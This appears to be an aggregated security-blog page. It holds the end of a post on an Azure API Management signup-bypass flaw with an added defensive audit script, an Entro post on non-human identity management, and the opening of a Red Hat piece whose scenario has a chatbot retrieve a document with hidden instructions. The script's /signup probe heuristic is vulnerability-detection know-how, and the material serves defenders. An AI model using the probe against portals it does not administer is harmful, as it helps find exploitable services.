post at: <a href="https://www.praetorian.com/blog/azure-apim-signup-bypass/">https://www.praetorian.com/blog/azure-apim-signup-bypass/</a> </p>
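The account audit in remediation step 4 and the response classification described under "Heuristic Analysis", as an added example in Python that is not Praetorian's code and does not reproduce the Azure CLI commands shown in the screenshots. It assumes the user-list JSON shape of the APIM REST API (properties.email, properties.registrationDate, properties.identities[].provider), a placeholder ARM service path and cutoff date, constructed user records, and a deleteSubscriptions query parameter on User Delete that should be confirmed against the current API reference before use:

```python
"""Audit APIM developer-portal accounts created via Basic Auth and classify a
/signup probe response. Added example; the records and ARM path are placeholders."""
import json
from datetime import datetime, timezone

ARM = "https://management.azure.com"
# Assumption: placeholder subscription, resource group and service name.
SERVICE_PATH = ("/subscriptions/00000000-0000-0000-0000-000000000000"
                "/resourceGroups/rg-apim/providers/Microsoft.ApiManagement/service/contoso-apim")
API_VERSION = "2022-08-01"  # assumption: any current stable APIM API version

# Constructed: the moment the "disable signup" toggle was flipped in the portal.
SIGNUP_DISABLED_AT = datetime(2025, 11, 1, tzinfo=timezone.utc)

# Constructed sample of a Users - List By Service response (shape only mirrors the API).
SAMPLE_USERS_JSON = json.dumps({"value": [
    {"name": "1", "properties": {"email": "admin@contoso.example",
        "registrationDate": "2025-06-01T09:00:00Z",
        "identities": [{"provider": "Basic", "id": "admin@contoso.example"}]}},
    {"name": "5d9d", "properties": {"email": "alice@contoso.example",
        "registrationDate": "2025-12-10T14:30:00Z",
        "identities": [{"provider": "Aad", "id": "alice@contoso.example"}]}},
    {"name": "f0ab", "properties": {"email": "mallory@freemail.example",
        "registrationDate": "2026-01-20T03:12:00Z",
        "identities": [{"provider": "Basic", "id": "mallory@freemail.example"}]}},
    {"name": "c3e1", "properties": {"email": "partner@contoso.example",
        "registrationDate": "2026-02-02T11:05:00Z",
        "identities": [{"provider": "Basic", "id": "partner@contoso.example"}]}},
]})


def _parse_ts(value):
    """ARM timestamps end in 'Z'; normalise so fromisoformat works on Python 3.7+."""
    return datetime.fromisoformat(value.replace("Z", "+00:00")) if value else None


def parse_users(payload):
    """Flatten the ARM list response into the fields the audit needs."""
    users = []
    for item in json.loads(payload).get("value", []):
        props = item.get("properties", {})
        users.append({
            "name": item["name"],
            "email": (props.get("email") or "").lower(),
            "registered": _parse_ts(props.get("registrationDate")),
            "providers": {i.get("provider", "") for i in props.get("identities", [])},
        })
    return users


def flag_unauthorized(users, cutoff, allowed_domains):
    """Flag accounts that (a) registered through the Basic provider after signup was
    'disabled' or (b) use an email domain outside the allow-list. A missing email
    counts as external, so it surfaces for manual review rather than slipping through."""
    flagged = []
    for u in users:
        reasons = []
        if "Basic" in u["providers"] and u["registered"] and u["registered"] > cutoff:
            reasons.append("basic-signup-after-cutoff")
        domain = u["email"].rsplit("@", 1)[-1] if "@" in u["email"] else ""
        if domain not in allowed_domains:
            reasons.append("external-email-domain")
        if reasons:
            flagged.append({"name": u["name"], "email": u["email"], "reasons": reasons})
    return flagged


def remediation_requests(service_path, flagged, api_version=API_VERSION):
    """Build the ARM calls that remove each flagged account together with its
    subscriptions, which revokes its keys. Assumption: User Delete accepts
    deleteSubscriptions=true; confirm against the current API reference."""
    return [{
        "method": "DELETE",
        "url": f"{ARM}{service_path}/users/{f['name']}"
               f"?api-version={api_version}&deleteSubscriptions=true",
    } for f in flagged]


def classify_signup_response(status, body):
    """Apply the post's heuristic to a POST /signup response with an empty JSON body:
    404 means the Basic provider is gone; a 400 mentioning ValidationError, captcha or
    challenge means the signup endpoint is still live. Anything else is inconclusive."""
    if status == 404:
        return "basic-provider-removed"
    if status == 400 and any(k in body.lower() for k in ("validationerror", "captcha", "challenge")):
        return "basic-signup-active"
    return "indeterminate"


if __name__ == "__main__":
    hits = flag_unauthorized(parse_users(SAMPLE_USERS_JSON), SIGNUP_DISABLED_AT, {"contoso.example"})
    for h in hits:
        print(h["name"], h["email"], ",".join(h["reasons"]))
    for r in remediation_requests(SERVICE_PATH, hits):
        print(f"az rest --method {r['method'].lower()} --url '{r['url']}'")
```

Run against a real tenant by feeding the output of the users list call (the one pictured in the step 4 screenshot) into parse_users; the printed az rest lines are a dry-run list to review before deleting anything. After step 1, a 404 from classify_signup_response on your own portal is the confirmation that the Basic provider, and with it the /signup endpoint, is actually gone.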

How do Non-Human Identities manage access?

  • Published date: 2026-03-24 00:00:00


<h2>Are You Overlooking the Crucial Role of Non-Human Identities in Access Management?</h2><p>Managing Non-Human Identities (NHIs) is no longer a luxury but a necessity for robust cybersecurity. These NHIs represent machine identities, pivotal in maintaining the security protocols inherent in automated systems. The growing reliance on technology across industries necessitates an understanding of their importance. But how exactly do NHIs manage access, and why should your organization care?</p><h3>Understanding the Essence of Non-Human Identities</h3><p>The concept of Non-Human Identities revolves around machine identities created by fusing a “Secret”—an encrypted password, token, or key—and the permissions granted by destination servers. Think of it as combining a tourist and their passport; the identity is the tourist, while the secret serves as the passport enabling access to different systems.</p><p>NHIs become crucial in environments relying heavily on automation, particularly in sectors like financial services, healthcare, travel, and DevOps. As organizations increasingly transition to cloud-centric operations, the demand for effective NHI management escalates. The absence of such oversight can create significant security gaps.</p><h3>Bridging the Gap: Security and R&amp;D Teams</h3><p>One of the perennial challenges faced by organizations is the disconnect between security and Research &amp; Development (R&amp;D) teams. This gap often leads to vulnerabilities that are easily exploitable by malicious entities. The comprehensive management of NHIs offers a cohesive strategy, facilitating a seamless and secure cloud environment. By ensuring end-to-end protection, NHIs help bridge these gaps effectively.</p><h3>Lifecycle Management in NHI</h3><p>Effective NHI management involves paying meticulous attention to every stage of their lifecycle, from discovery and classification to threat detection and remediation. 
Such an approach contrasts significantly with point solutions like secret scanners, which offer a narrow field of protection.</p><ul> <li><strong>Discovery and Classification:</strong> Identifying and categorizing NHIs is the foundational step in establishing secure systems.</li> <li><strong>Threat Detection:</strong> Monitoring the NHIs’ behaviors within systems is crucial for detecting any anomalies or potential threats to security.</li> <li><strong>Remediation:</strong> Prompt actions based on identified threats help mitigate risks efficiently.</li> </ul><p>Understanding the entire lifecycle facilitates a context-aware security practice, offering insights into ownership, permissions, usage patterns, and potential vulnerabilities.</p><h3>Benefits of Implementing NHI Management</h3><p>Organizations committed to NHI management experience several significant advantages:</p><ul> <li><strong>Reduced Risk:</strong> Proactively mitigating security threats decreases the likelihood of breaches and data leaks.</li> <li><strong>Improved Compliance:</strong> By meeting regulatory requirements through policy enforcement and audit trails, businesses adhere to necessary compliance standards.</li> <li><strong>Increased Efficiency:</strong> Automating NHIs and secrets management allows security teams to concentrate on strategic initiatives.</li> <li><strong>Enhanced Visibility and Control:</strong> A centralized view for access management and governance empowers organizations with better security oversight.</li> <li><strong>Cost Savings:</strong> Automating secrets rotation and decommissioning NHIs significantly reduces operational costs.</li> </ul><h3>Insights into Industry Relevance</h3><p>Given the diverse range of industries relying on cloud technology, from healthcare to travel, the relevance of NHI management cannot be overstated. For DevOps and Security Operations Center (SOC) teams, efficient NHI management optimizes operations and safeguards against potential threats. 
Such practices translate into not just compliance and security but also a dependable operational framework that withstands the test of time.</p><p>For more on how <a href="https://entro.security/blog/harnessing-ai-in-ima-and-am/">harnessing AI in Identity and Access Management (IAM) and Access Management (AM)</a> can complement NHI management, explore strategies that lead to a more secure environment.</p><h3>Building a Secure Cloud Environment</h3><p>The cloud has become the backbone of modern operations, transforming how businesses innovate and serve their clients. However, this transition demands a renewed focus on security. NHIs play a pivotal role, addressing prevalent security gaps and facilitating a secure cloud environment. This aligns with <a href="https://entro.security/blog/just-in-time-access-role-in-non-human-identities-access-management/">Just-in-Time access in Non-Human Identities access management </a> to ensure timely and secured permissions.</p><p>The strategic significance of NHIs becomes evident when they help manage machine identities crucial to better cybersecurity measures. Interested in a deeper dive on how this strategic approach aligns with zero trust principles? See the discussion on <a href="https://entro.security/blog/the-role-of-secrets-management-in-zero-trust-architecture/">the role of secrets management in Zero Trust Architecture</a>.</p><p>By taking a holistic view of NHI management, organizations not only protect their systems but also create an agile infrastructure capable of adapting to evolving threats. This approach represents a forward-thinking paradigm, empowering businesses to navigate the complexities of cybersecurity with confidence.</p><h3>Why Are Non-Human Identities Essential for Cloud Security?</h3><p>Have you ever considered how cloud security would function without proper oversight of Non-Human Identities (NHIs)? 
When organizations shift more of their operations to the cloud, they encounter an equally significant shift in focus towards safeguarding these machine identities. NHIs include encrypted passwords, tokens, and keys that effectively act as digital signatures, allowing machines to communicate securely and efficiently. When managed correctly, they provide a robust line of defense against unauthorized access and potential breaches.</p><p>Mismanagement or neglect of NHIs can severely compromise security, expose sensitive data, and even bring operations to a standstill. Ineffective NHI management has consequences that ripple through every level of an enterprise’s architecture, highlighting the essential role these identities play in digital operations. These challenges elevate the importance of adopting a comprehensive approach to NHI management so that organizations can fortify their cloud-based operations.</p><h3>Real-world Implications and Industry Challenges</h3><p>In industries like financial services and healthcare, where sensitive data is abundant, the proper management of NHIs is crucial. These sectors routinely handle large volumes of sensitive information, from financial transactions to personal health records, making them prime targets for cyberattacks. In these fields, an improperly managed machine identity can open the door to devastating breaches.</p><p>Across various industries—such as travel, DevOps, and SOC teams—the common thread of concern points to automating processes while maintaining security. Cloud technology brings unprecedented scalability and operational efficiency, but it also creates unique challenges. Companies need to integrate NHI management as a cornerstone of their cybersecurity strategy, balancing this advancement with stringent security measures.</p><h3>Understanding Technical Advancements</h3><p>Is your organization keeping pace with the latest advancements in NHI management? 
Behavioral analytics and machine learning, for instance, play a vital role in enhancing NHI oversight. These technologies help create advanced systems that predict and alert to abnormal behavior based on historic data patterns. Such sophistication supports a proactive security posture, catching potential threats before they manifest into full-fledged attacks.</p><p>Moreover, implementing multi-factor authentication (MFA) for machines, much like humans, adds an extra layer of security. MFA ensures that even if a machine’s “passport” or identity gets compromised, unauthorized entities cannot easily exploit system access. For insights on implementing these protocols, explore the detailed guidelines outlined in <a href="https://entro.security/blog/implementing-nhi-security-protocols/">Implementing NHI Security Protocols</a>.</p><h3>Automation: The Double-Edged Sword</h3><p>While automation contributes to efficiency and scalability, it inherently carries risks if not meticulously managed. Automating the lifecycle of NHIs—ensuring timely updates, permissions adjustments, and decommissioning—reduces the chances of security lapses. Yet, the failure to update and rotate secrets promptly could lead to vulnerabilities. This emphasizes the importance of comprehensive automation strategies to mitigate risk, as highlighted in <a href="https://entro.security/blog/how-cisos-should-prepare-for-2025/">how CISOs should prepare for 2025</a>.</p><p>Meanwhile, those involved in DevOps face parallel challenges. The speed and agility provided by DevOps necessitate machine identities to seamlessly interconnect various components within cloud infrastructure. NHI management must therefore align with DevOps methodologies, ensuring that systems are both agile and secure.</p><h3>Segmentation and Access Control</h3><p>A robust NHI management strategy necessitates precise segmentation and access control. 
Segmenting machine identities helps compartmentalize access and limits the scope of potential breaches. As NHIs communicate between applications, databases, and scripts, defining access parameters based on roles ensures that machines execute only what they are permitted to, preventing overreach and misuse.</p><p>In developing these frameworks, organizations gain enhanced oversight into machine communications and workflows. Such insights aid in identifying and sealing security loopholes, creating fortified, yet flexible, security postures.</p><h3>New Approaches with Artificial Intelligence</h3><p>Are you leveraging AI to optimize NHI management in your organization? Artificial intelligence introduces new ways of managing NHIs by automating the detection of threat anomalies and proposing remediation actions. AI’s predictive modeling capabilities offer insights into access behaviors and patterns, helping refine security procedures. For more information on integrating AI into Identity Access Management, explore <a href="https://entro.security/blog/non-human-identity-security-in-saas/">Non-Human Identity Security in SaaS</a>.</p><p>Integrating AI into managing machine identities ensures a dynamic response to emerging threats, enhancing the ability to neutralize them swiftly. This merging of AI with NHI systems represents a pivotal evolution in cybersecurity dynamics.</p><p>In summary, as digital environments become progressively complex, Non-Human Identities and secrets management remains a pivotal component. Building and maintaining a secure cloud environment requires a concerted focus on managing these machine identities at each stage of their lifecycle. By aligning various departmental security policies and leveraging technological advancements like AI, progressive organizations will ensure robust and enduring protection across their cloud environments. 
With these strategies in place, businesses can boost their resilience against escalating cybersecurity threats and drive innovation, knowing their core operations remain secure.</p><p>The post <a href="https://entro.security/how-do-non-human-identities-manage-access/">How do Non-Human Identities manage access?</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/how-do-non-human-identities-manage-access/">https://entro.security/how-do-non-human-identities-manage-access/</a> </p>

What does “AI security” mean and why does it matter to your business?

  • Published date: 2026-03-24 00:00:00

Let's imagine a customer-support chatbot—it's running on Red Hat OpenShift AI and searches internal documents to answer questions. A user asks it a common question, but the chatbot inadvertently retrieves a malicious document that contains hidden instructions…
